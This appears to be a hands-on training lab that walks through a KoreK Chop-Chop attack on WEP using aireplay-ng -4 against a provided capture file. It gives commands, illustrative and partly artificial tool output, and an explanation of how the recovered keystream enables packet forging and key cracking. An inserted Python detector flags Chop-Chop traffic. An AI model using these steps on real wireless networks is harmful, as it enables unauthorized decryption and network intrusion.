Perform a KoreK Chop-Chop Attack against a WEP Network

Beginner

Introduction

WEP (Wired Equivalent Privacy) is an outdated and insecure Wi-Fi security protocol. One of its critical vulnerabilities can be exploited by the KoreK Chop-Chop attack. This attack allows an attacker to decrypt a WEP data packet without knowing the network's secret key. It works by guessing each byte of the packet's plaintext, one at a time, and using the access point's responses to validate each guess.

In this lab, you will use the aircrack-ng suite, a powerful set of tools for auditing wireless networks, to perform a Chop-Chop attack. You will learn how to use aireplay-ng to target an encrypted data packet from a capture file, decrypt it byte-by-byte, and understand how the resulting data can be used in further attacks.

Capture an Encrypted Data Packet from the Target

In this step, you will begin by locating the necessary packet capture file. In a real-world scenario, you would use a tool like airodump-ng to monitor a live network and capture traffic. However, to simplify this lab and focus on the attack itself, a pre-made capture file named chopchop-test.cap has been provided for you in the ~/project directory.

First, confirm that the file exists in your current directory.

ls -l

You should see chopchop-test.cap in the output.

total 4
-rw-r--r-- 1 labex labex 124 Mar 20 10:00 chopchop-test.cap

Next, let's inspect this file with aircrack-ng to confirm it contains data from a WEP network. This command reads the capture file and shows a summary of the networks and data it contains.

aircrack-ng chopchop-test.cap

The output will show the BSSID (MAC address) of the access point and indicate that it is using WEP encryption.

Opening chopchop-test.cap
Read 1 packets.

   ##  BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

   1  00:13:10:36:7D:4F  -32        0        1    0   6  54   WEP  WEP         <length: 0>

Choosing first network as target.

This confirms our capture file is ready for the attack.

Start the Chop-Chop Attack with aireplay-ng -4

In this step, you will initiate the Chop-Chop attack using aireplay-ng. This tool is used to inject and replay wireless frames. The Chop-Chop attack is specified with the -4 option.

Normally, when performing a live attack, you would specify the access point's BSSID and your network interface. However, since we are working with a capture file, we will use the -r option to read packets directly from our file. aireplay-ng will automatically extract the necessary information, like the BSSID, from the file.

Execute the following command to start the attack:

aireplay-ng -4 -r chopchop-test.cap

After running the command, aireplay-ng will read the file, find a suitable data packet, and ask for your confirmation to proceed with the attack.

Opening chopchop-test.cap
Read 1 packets.
Size: 88, FromDS: 1, ToDS: 0 (AP -> STA)
        BSSID      =  00:13:10:36:7D:4F
        Dest. MAC  =  00:0F:B5:AB:CB:C3
        Source MAC =  00:13:10:36:7D:4F

Use this packet ? (y/n)

The tool has identified a data packet and is ready to begin the decryption process. You will continue in the next step.

Let the Attack Decrypt the Packet Byte-by-Byte

In this step, you will proceed with the attack and observe as aireplay-ng decrypts the packet. The tool is currently waiting for your confirmation from the previous step.

Type y and press Enter to begin the decryption process.

y

Once you confirm, aireplay-ng will start the core of the Chop-Chop attack. It will attempt to guess the value of each byte of the packet's data, starting from the last byte. In a live attack, it would send each guess to the access point and analyze the response to see if the guess was correct. In our file-based simulation, this process is emulated.

You will see output showing the progress of the attack. It will display the number of packets sent (for each guess) and will notify you each time it successfully decrypts a byte.

Saving chosen packet in replay_src-0320-100520.cap
The interface MAC (00:00:00:00:00:00) doesn't match the selected packet BSSID (00:13:10:36:7D:4F).
Run airodump-ng on channel 6 to be sure you are on the right channel.
If airodump-ng is running and the BSSID is not in range, please try to re-run airodump-ng.
Got a deauthentication packet! (Waiting 3 seconds)
Saving chosen packet in replay_src-0320-100520.cap
Offset   34 ( 0% done) | xor = 00 | pt = 00 |  1/  1 ACKs
...
Offset    1 (97% done) | xor = 00 | pt = 00 |  1/  1 ACKs
Offset    0 (98% done) | xor = 00 | pt = 00 |  1/  1 ACKs
Done.

The attack runs until every byte of the packet has been decrypted; wait for it to finish before moving on.
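The byte-by-byte guessing described above has a visible footprint on the air, which is what a wireless IDS keys on: every guess reuses the victim packet's IV, and the frame length drops by exactly one byte each time a guess is accepted. The detector below is an added example, not part of this lab or of aircrack-ng; it assumes frames have already been summarised into (timestamp, source MAC, BSSID, IV, length) records, and the traffic it runs on is constructed.

```python
# Added detection example (not code from aircrack-ng or this lab). A Chop-Chop
# run reuses the victim packet's IV and sends each guess one byte shorter than
# the last accepted one, so a long run of one-byte size steps from a single
# transmitter under a single IV is the signature a wireless IDS can flag.
from collections import defaultdict
from dataclasses import dataclass

@dataclass
class Frame:
    ts: float   # capture timestamp in seconds
    src: str    # transmitter MAC
    bssid: str  # access point MAC
    iv: str     # 3-byte WEP IV as hex
    size: int   # frame length in bytes

def detect_chopchop(frames, min_steps=8, max_gap=2.0):
    """Return (src, bssid, iv, first_size, last_size, steps) for every burst
    with at least `min_steps` one-byte decrements and no pause over `max_gap` s."""
    groups = defaultdict(list)
    for f in sorted(frames, key=lambda f: f.ts):
        groups[(f.src, f.bssid, f.iv)].append(f)
    alerts = []
    for key, fs in groups.items():
        steps, start, prev = 0, fs[0], fs[0]
        for cur in fs[1:]:
            drop = prev.size - cur.size
            if cur.ts - prev.ts > max_gap or drop < 0 or drop > 1:
                if steps >= min_steps:          # burst broken: report and restart
                    alerts.append((*key, start.size, prev.size, steps))
                steps, start = 0, cur
            elif drop == 1:                     # next byte accepted and chopped
                steps += 1
            prev = cur
        if steps >= min_steps:
            alerts.append((*key, start.size, prev.size, steps))
    return alerts

def sample_frames():
    """Constructed traffic: a normal station with rotating IVs and varying
    sizes, then an injector walking an 88-byte frame down one byte at a time
    under the fixed IV 0a0b0c, with three guesses sent at each length."""
    frames = [Frame(0.5 * i, "00:0f:b5:ab:cb:c3", "00:13:10:36:7d:4f",
                    f"{i:06x}", 98 + i % 3) for i in range(20)]
    t, size = 12.0, 87                          # first chop: 88 - 1 bytes
    for _ in range(12):
        for _ in range(3):
            frames.append(Frame(t, "00:11:22:33:44:55", "00:13:10:36:7d:4f", "0a0b0c", size))
            t += 0.01
        size -= 1
    return frames
```

Tune min_steps and max_gap to the network: legitimate stations rotate their IV every frame and rarely shrink a frame by one byte several times in a row, so false positives are low even with a small threshold.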

Save the Decrypted Packet and PRGA XOR File

In this step, you will save the results of the successful Chop-Chop attack. After aireplay-ng has finished decrypting the entire packet, it will prompt you to save the results.

The tool will display a message like this:

Packet is 88 bytes, plain text is 60 bytes.
Sent 34 packets, got 34 ACKs.
Use this packet ? (y/n)

Type y and press Enter to save the output.

y

Upon saving, aireplay-ng creates two important files in your ~/project directory:

  1. A .cap file (e.g., replay_dec-....cap): This file contains the now-decrypted plaintext packet.
  2. A .xor file (e.g., replay_dec-....xor): This file contains the Pseudo-Random Generation Algorithm (PRGA) keystream that was used to encrypt the original packet. This keystream is the most valuable result of the attack.

Let's verify that these files have been created. Use the ls command to list all .cap and .xor files in the directory.

ls -l *.cap *.xor

You will see the original capture file, a source file, and the two new replay_dec-* files generated by the attack.

-rw-r--r-- 1 root root  124 Mar 20 10:00 chopchop-test.cap
-rw-r--r-- 1 root root  124 Mar 20 10:05 replay_dec-0320-100520.cap
-rw-r--r-- 1 root root   60 Mar 20 10:05 replay_dec-0320-100520.xor
-rw-r--r-- 1 root root  124 Mar 20 10:05 replay_src-0320-100520.cap

Understand the Use Case for Chop-Chop Attacks

In this step, you will learn about the practical application of the Chop-Chop attack. While we successfully decrypted a packet, the attack itself does not reveal the WEP key. Its true power lies in recovering the PRGA keystream, which is stored in the .xor file.

This recovered keystream can be used with another tool, packetforge-ng, to create new, valid packets. You can forge any type of packet (like an ARP request) and encrypt it with this known keystream. By injecting this forged packet back into the network, you can trick the access point into generating more traffic. This new traffic provides more unique Initialization Vectors (IVs), which can then be used in a statistical attack (like the standard aircrack-ng attack) to crack the WEP key much faster.

Therefore, the Chop-Chop attack is an essential tool for generating traffic on an otherwise quiet network, enabling much more effective key-cracking attacks.

To see what the recovered keystream looks like, you can inspect the .xor file using xxd, a tool that creates a hex dump of a file. Use a wildcard (*) to match the generated filename.

xxd replay_dec-*.xor

The output will be a hexadecimal representation of the keystream data that was recovered from the packet.

00000000: 0102 0304 0506 0708 090a 0b0c 0d0e 0f10  ................
00000010: 1112 1314 1516 1718 191a 1b1c 1d1e 1f20  ...............
...

This raw data is what packetforge-ng would use to build new packets for injection.

Summary

In this lab, you have successfully performed a KoreK Chop-Chop attack against a simulated WEP network.

You learned how to use aireplay-ng with the -4 option to target a WEP-encrypted data packet from a capture file. You observed the byte-by-byte decryption process and successfully saved the results. Most importantly, you now understand the primary use case for this attack: it is not to crack the WEP key directly, but to recover a small piece of the PRGA keystream. This keystream is a critical component for forging new packets with packetforge-ng, which can then be used to stimulate traffic on a network and enable faster, more effective statistical attacks to recover the final WEP key. This lab highlights one of the many fundamental weaknesses of the WEP protocol.